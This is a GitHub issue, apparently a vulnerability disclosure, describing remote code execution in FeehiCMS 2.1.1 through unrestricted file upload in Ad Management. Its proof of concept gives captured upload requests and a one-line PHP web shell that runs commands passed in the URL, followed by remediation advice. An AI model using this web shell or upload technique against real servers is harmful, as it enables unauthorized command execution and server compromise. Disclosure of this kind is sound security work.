cms icon indicating copy to clipboard operation
cms copied to clipboard
verified publisher icon liufee

FeehiCMS version 2.1.1 - Remote Code Execution via Unrestricted File Upload in Ad Management

Open kiwi865 opened this issue 3 months ago • 0 comments

[Remote Code Execution via Unrestricted File Upload in Ad Management]

Severity Score: Medium

CVSS Score: 9.6 Critical, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Description

FeehiCMS version 2.1.1 allows authenticated remote attackers to upload files that the server later executes (or stores in an executable location) without sufficient validation, sanitization, or execution restrictions. An authenticated remote attacker can upload a crafted PHP file and cause the application or web server to execute it, resulting in remote code execution (RCE).

Impact

Successful exploit allows authenticated remote attacker to run arbitrary system code in the remote server.

POC

Login as a backend user. Navigate to Ad Management.

Image

Upload a JPEG file and intercept the request.

Image

POST /admin/index.php?r=ad%2Fupdate&id=28 HTTP/1.1 Host: localhost:8081 Content-Length: 1538 Cache-Control: max-age=0 sec-ch-ua: "Not=A?Brand";v="24", "Chromium";v="140" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 Origin: http://localhost:8081 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypK0eH5nAvIbNsDBe Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost:8081/admin/index.php?r=ad%2Fupdate&id=28 Accept-Encoding: gzip, deflate, br Cookie: BACKEND_FEEHICMS=5440ac6b677107979c81bba2e1725e94; _csrf_backend=aa1a406cf3605aa65a70ffdc74b2d296fb53c6a3e287c4db4b55e5635b144f0ca%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22imys3cRYiJYJLd36o-GVC8Zqp3Ml3Tyy%22%3B%7D; PHPSESSID=26fb8e4f9ee735093815221c4fc419fe; _identity=36b1340757dfa97b272930f316919bab2d038b7d849034c6306a06aa8f16e92aa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22CDtE4877YiX55NQ_UTVXh8DhQ5TZjCKH%22%2C2592000%5D%22%3B%7D; _csrf=bb4f8d35c63f1529608814ced457ad3587f68ab334853e5bb2047aed56f7bbc1a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%223ZCnqhasM7_8OcwWLHzGTsw5PqXitHu-%22%3B%7D Connection: keep-alive

------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="_csrf_backend"

zSOUf0esoGIwUYyGdhiTFfDJXSQ3rUwfetdh4Zy7B4WkTu0MdM_yO1kb1cw6fKAjn-QacnSVFm4K5CyNr-9-_A== ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[name]"

aaa ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[tips]"

aa ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[input_type]"

1 ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[ad]"

0 **> ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[ad]"; filename="2.jpeg" Content-Type: image/jpeg

asdasdsa** ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[link]"

aa ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[desc]"

aa ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[target]"

------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[target]"

_blank ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[sort]"

0 ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[autoload]"

------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[autoload]"

1 ------WebKitFormBoundarypK0eH5nAvIbNsDBe--

Modify the following. File extension: jpeg --> php Modify the file content to <?php system($_GET['cmd']); ?>.

Image

POST /admin/index.php?r=ad%2Fupdate&id=28 HTTP/1.1 Host: localhost:8081 Content-Length: 1541 Cache-Control: max-age=0 sec-ch-ua: "Not=A?Brand";v="24", "Chromium";v="140" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 Origin: http://localhost:8081 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypK0eH5nAvIbNsDBe Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost:8081/admin/index.php?r=ad%2Fupdate&id=28 Accept-Encoding: gzip, deflate, br Cookie: BACKEND_FEEHICMS=5440ac6b677107979c81bba2e1725e94; _csrf_backend=aa1a406cf3605aa65a70ffdc74b2d296fb53c6a3e287c4db4b55e5635b144f0ca%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22imys3cRYiJYJLd36o-GVC8Zqp3Ml3Tyy%22%3B%7D; PHPSESSID=26fb8e4f9ee735093815221c4fc419fe; _identity=36b1340757dfa97b272930f316919bab2d038b7d849034c6306a06aa8f16e92aa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22CDtE4877YiX55NQ_UTVXh8DhQ5TZjCKH%22%2C2592000%5D%22%3B%7D; _csrf=bb4f8d35c63f1529608814ced457ad3587f68ab334853e5bb2047aed56f7bbc1a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%223ZCnqhasM7_8OcwWLHzGTsw5PqXitHu-%22%3B%7D Connection: keep-alive

------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="_csrf_backend"

zSOUf0esoGIwUYyGdhiTFfDJXSQ3rUwfetdh4Zy7B4WkTu0MdM_yO1kb1cw6fKAjn-QacnSVFm4K5CyNr-9-_A== ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[name]"

aaa ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[tips]"

aa ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[input_type]"

1 ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[ad]"

0 **> ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[ad]"; filename="2.php" Content-Type: application/octet-stream

**

------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[link]"

aa ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[desc]"

aa ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[target]"

------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[target]"

_blank ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[sort]"

0 ------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[autoload]"

------WebKitFormBoundarypK0eH5nAvIbNsDBe Content-Disposition: form-data; name="AdForm[autoload]"

1 ------WebKitFormBoundarypK0eH5nAvIbNsDBe--

In the backend server, observe the uploaded file path.

Image

Open the path in the browser, and run the system commands.

Image

Remediation

  1. Strict Allowlist of File Types. Only accept specific, necessary file types (e.g., .pdf) and reject everything else. Validate by file-signature (magic bytes), not by extension or client MIME type.
  2. Store Outside Webroot & Non-Executable Storage. Persist uploaded files to locations that are not served or executed by the web server. Ensure uploaded directories are mounted with “noexec” where supported; set file permissions to disallow execution.
  3. Server-Side Content Validation and Sanitization. Inspect file contents for embedded code or script tags. Perform content scanning (static and antivirus). Normalize and sanitize filenames; generate server-side names (e.g., UUIDs) to avoid control characters or path traversal.

kiwi865 avatar Oct 02 '25 19:10 kiwi865